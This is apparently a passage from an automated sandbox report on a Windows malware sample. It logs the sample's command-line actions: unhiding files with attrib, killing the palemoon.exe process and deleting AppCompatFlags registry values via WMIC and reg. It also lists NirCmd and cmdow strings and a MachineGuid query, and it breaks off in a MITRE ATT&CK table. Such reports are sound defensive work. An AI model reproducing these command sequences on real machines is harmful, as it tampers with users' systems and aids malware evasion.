                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\attrib.exe C:\Windows\System32\attrib.exe -h -r -s "C:\Users\user\AppData\Local\Temp\Tweaker\*.*"Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe C:\Windows\System32\wbem\WMIC.exe process where (name="RtkAudio.exe") get commandline Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\attrib.exe C:\Windows\System32\attrib.exe -h -r -s "C:\Windows\SysWOW64\en\*.*"Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\attrib.exe C:\Windows\System32\attrib.exe -h -r -s "C:\Users\Public\*.*"Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe C:\Windows\System32\timeout.exe /t 1Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\attrib.exe C:\Windows\System32\attrib.exe -h -r -s "C:\Users\user\AppData\Local\Temp\Tweaker\*.*"Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe C:\Windows\System32\wbem\WMIC.exe process where (name="RtkAudio.exe") get commandline Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe C:\Windows\System32\reg.exe delete "HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers" /va /fJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe C:\Windows\System32\wbem\WMIC.exe process where "name like '%palemoon.exe%'" Call TerminateJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe C:\Windows\System32\wbem\WMIC.exe process where (name="RtkAudio.exe") get commandline Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\attrib.exe C:\Windows\System32\attrib.exe -h -r -s "C:\Windows\SysWOW64\en\*.*"Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe C:\Windows\System32\reg.exe delete "HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers" /va /fJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe C:\Windows\System32\reg.exe delete "HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers" /va /fJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\attrib.exe C:\Windows\System32\attrib.exe -h -r -s "C:\Users\Public\*.*"Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
                            Source: K4gsPJGEi4.exe, cmdow.exe0.15.dr, cmdow.exe.15.dr, cm.avi.15.dr, cmdo.jpg.15.drBinary or memory string: Shell_TrayWnd
                            Source: K4gsPJGEi4.exe, cmdow.exe0.15.dr, cmdow.exe.15.dr, cm.avi.15.dr, cmdo.jpg.15.drBinary or memory string: use CMDOW /? <parameter>. Eg CMDOW /? /window or CMDOW /? /act.Shell_TrayWndkernel32.dllSetConsoleDisplayMode
                            Source: screen.exe, screen.exe, 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, screen.exe, 00000017.00000002.2200493509.0000000000401000.00000040.00000001.01000000.00000006.sdmpBinary or memory string: Progman
                            Source: screen.exe, screen.exe, 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, screen.exe, 00000017.00000002.2200493509.0000000000401000.00000040.00000001.01000000.00000006.sdmpBinary or memory string: progman
                            Source: screen.exe, screen.exe, 00000012.00000002.2197078255.0000000000401000.00000040.00000001.01000000.00000006.sdmp, screen.exe, 00000017.00000002.2200493509.0000000000401000.00000040.00000001.01000000.00000006.sdmpBinary or memory string: shell_traywnd
                            Source: screen.exe, 00000017.00000002.2200493509.0000000000401000.00000040.00000001.01000000.00000006.sdmpBinary or memory string: "Userenv.dllCreateEnvironmentBlockCreateProcessWithLogonWExplorer.exeShell_TrayWndProgmanSetConsoleDisplayModeEnumDisplayDevicesAmasterwaveoutsynthcdmicrophonephoneauxlineheadphoneswaveinaltctrlshiftextplusspcentertabescinsdelDllRegisterServerDllUnregisterServerNirCmdWinClsfolder.loopcountcurrdate.currtime.sys.nir.param.fparam.clipboardNirComLinenowexefilesystemwindowsnircmdcommon_desktopcommon_start_menucommon_programsdesktopstart_menuprogramsstartupappdatacookiesfavoritesrecentcommon_startupcommon_favoritesprogramfilescommon_programfilesmydocumentsnormallowbelownormalabovenormalhighrealtimeSeTcbPrivilegeSeDebugPrivilegenohexnoasciibinCannot find the specified process !Failed to load the process library !leftshiftrightshiftleftctrlrightctrlleftmenurightmenudownupleftrighthomeendinsertdeletecommaminusperiodlwinrwinappspageuppagedownmultiplyaddsubtractseperatordividebackspacepausecapslocknumlockscrollprintscreen#32770clicksettextshowshownahidehideshowflashmaxminsettopmostfocusactivateenabledisabletoggledisabletogglehidetogglemintogglemaxredrawsetsizesendmsgpostmsgcenterchildmovedlgclickdlgsettextdlgsetfocus+style-style+exstyle-exstyletranstitlestitleititleetitleidclassprocessalltopalltopnodesktopprogmanshell_traywndbuttonallFailed to create the shortcut !nircmd.exe %sadmin$\nircmd.exe\\cfocusedsystemsoundsSound Devicesdefault_recordshowerrorparamsfilecmdwaitloopremotecopymultiremoteqboxcomqboxcomtopinfoboxqboxqboxtopexec2execexecmdcmd.execommand.com%s /c %sregsetvalThe specified key is not valid !SZEXPAND_SZDWORDBINARYregdelvalregdelkeyCannot delete the key, because it contains one or more subkeys.regeditinisetvalinidelvalinidelsecrasdialdlginetdialThe dialing function is not available in your system !rasdialUnable to receive dialup information of the specified entry !moverecyclebinemptybinrashangupFailed to hung up this RAS itemCannot find the specified connection name !exitwinlogoffpoweroffrebootshutdownforceforceifhungabortshutdowninitshutdowncmdshortcutcmdshortcutkeyshortcutshexecFailed to execute this file !clonefiletimesetfiletimesetfilefoldertimesetconsolemodeconsolewritesetconsolecolordebugwritesetcursorsetcursorwinrestartexplorersendkeypress+sendkeypresssendmousewheeldblclickmovecursorchangebrightness\\.\LCDsetbrightnesssetprimarydisplaysetdisplaymonitor:-updatereg-allusersFailed to change the display setting !Invalid display values !closeprocessFailed to close the specified process !killprocessFailed to kill the specified process !memdumpserviceUnable to load the services library !stopcontinuestartrestartautomanualdisabledbootwinhandleactiveforegroundlockwsclearsetfilereadfilewritefilewriteufileaddfileaddufilecopyimagesaveimageloadclpsaveclpsetdialuplogonFailed to set the logon details for this dialup item !scriptmediaplayopen "%s" type mpegvideo alias %splay %sclose %surlshortcut%fav%Failed to create the internet shortcut !monitoroffonasync_offasync_onasync_lowscreensaverscreensavertimeoutrunassystemwinlogon.exeruninteractiveruninteract
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\screen.exeCode function: 18_2_00405CBA _strcmpi,GetSystemTime,SystemTimeToFileTime,SystemTimeToFileTime,LocalFileTimeToFileTime,18_2_00405CBA
                            Source: C:\Users\user\AppData\Local\Temp\screen.exeCode function: 18_2_004023FF GetVersionExA,18_2_004023FF
                            Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                            Gather Victim Identity Information211
                            Scripting
                            1
                            Replication Through Removable Media
                            121
                            Windows Management Instrumentation
                            211
                            Scripting
                            1
